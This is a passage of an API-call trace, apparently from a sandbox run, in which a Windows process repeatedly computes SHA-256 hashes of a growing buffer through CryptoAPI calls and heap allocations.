	[0250.383] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778550, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778550, pdwDataLen=0x128c3c) returned 1
	[0250.383] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.383] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.383] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.383] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.383] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0250.383] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27782a8
	[0250.383] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27782a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27782a8, pdwDataLen=0x128c3c) returned 1
	[0250.383] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.383] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.383] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.383] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.383] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0250.383] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.384] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d58
	[0250.384] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2777d58, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777d58, pdwDataLen=0x128c3c) returned 1
	[0250.384] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.384] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.384] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.384] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.384] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0250.384] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.384] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27785a0
	[0250.384] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27785a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27785a0, pdwDataLen=0x128c3c) returned 1
	[0250.384] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.384] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.384] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.384] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.384] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0250.385] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.385] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0918
	[0250.385] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0918, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0918, pdwDataLen=0x128c3c) returned 1
	[0250.385] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.385] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.385] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.385] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.385] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0250.385] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.385] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c06c0
	[0250.385] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c06c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c06c0, pdwDataLen=0x128c3c) returned 1
	[0250.385] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.385] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.385] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.385] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.385] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0250.386] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c05a8
	[0250.386] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c05a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c05a8, pdwDataLen=0x128c3c) returned 1
	[0250.386] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.386] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.386] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.386] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.386] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0250.386] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c07d8
	[0250.386] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c07d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c07d8, pdwDataLen=0x128c3c) returned 1
	[0250.386] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.386] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.386] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.386] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.386] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0250.387] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.387] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0800
	[0250.387] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0800, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0800, pdwDataLen=0x128c3c) returned 1
	[0250.387] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.387] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.387] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.387] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.387] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0250.387] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.387] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c06e8
	[0250.387] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c06e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c06e8, pdwDataLen=0x128c3c) returned 1
	[0250.387] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.387] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.387] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.387] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.387] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0250.388] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.388] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0580
	[0250.388] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0580, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0580, pdwDataLen=0x128c3c) returned 1
	[0250.388] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.388] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.388] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.388] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.388] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0250.388] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.388] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0710
	[0250.388] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0710, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0710, pdwDataLen=0x128c3c) returned 1
	[0250.388] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.388] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.388] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.388] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.388] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0250.389] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.389] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c08f0
	[0250.389] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c08f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c08f0, pdwDataLen=0x128c3c) returned 1
	[0250.389] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.389] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.389] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.389] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.389] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0250.389] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.389] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0738
	[0250.389] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0738, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0738, pdwDataLen=0x128c3c) returned 1
	[0250.389] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.389] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.389] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.390] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.390] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0250.390] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.390] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0030
	[0250.390] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0030, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0030, pdwDataLen=0x128c3c) returned 1
	[0250.390] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.390] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.390] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.390] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.390] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0250.390] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.390] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0760
	[0250.390] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0760, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0760, pdwDataLen=0x128c3c) returned 1
	[0250.390] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.390] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.390] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.391] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.391] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0250.391] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0670
	[0250.391] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0670, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0670, pdwDataLen=0x128c3c) returned 1
	[0250.391] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.391] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.391] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.391] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.391] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0250.391] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0940
	[0250.391] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0940, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0940, pdwDataLen=0x128c3c) returned 1
	[0250.391] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.391] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.391] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.392] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.392] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0250.392] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0968
	[0250.392] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0968, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0968, pdwDataLen=0x128c3c) returned 1
	[0250.392] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.392] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.392] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.392] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.392] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0250.392] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bffe0
	[0250.392] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27bffe0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bffe0, pdwDataLen=0x128c3c) returned 1
	[0250.392] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.392] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.392] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.393] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.393] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0250.393] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf6a8
	[0250.393] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27bf6a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bf6a8, pdwDataLen=0x128c3c) returned 1
	[0250.393] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.393] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.393] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.393] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.393] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0250.393] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0250.393] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0648, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0648, pdwDataLen=0x128c3c) returned 1
	[0250.393] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.393] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.393] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.394] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.394] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0250.394] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c05d0
	[0250.394] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c05d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c05d0, pdwDataLen=0x128c3c) returned 1
	[0250.394] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.394] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.394] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.394] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.394] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0250.394] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2880
	[0250.394] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2880, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2880, pdwDataLen=0x128c3c) returned 1
	[0250.394] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.394] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.394] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.395] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.395] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0250.395] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.395] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2920
	[0250.395] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2920, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2920, pdwDataLen=0x128c3c) returned 1
	[0250.395] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.395] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.395] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.395] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.395] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0250.395] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.395] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0558
	[0250.395] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0558, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0558, pdwDataLen=0x128c3c) returned 1
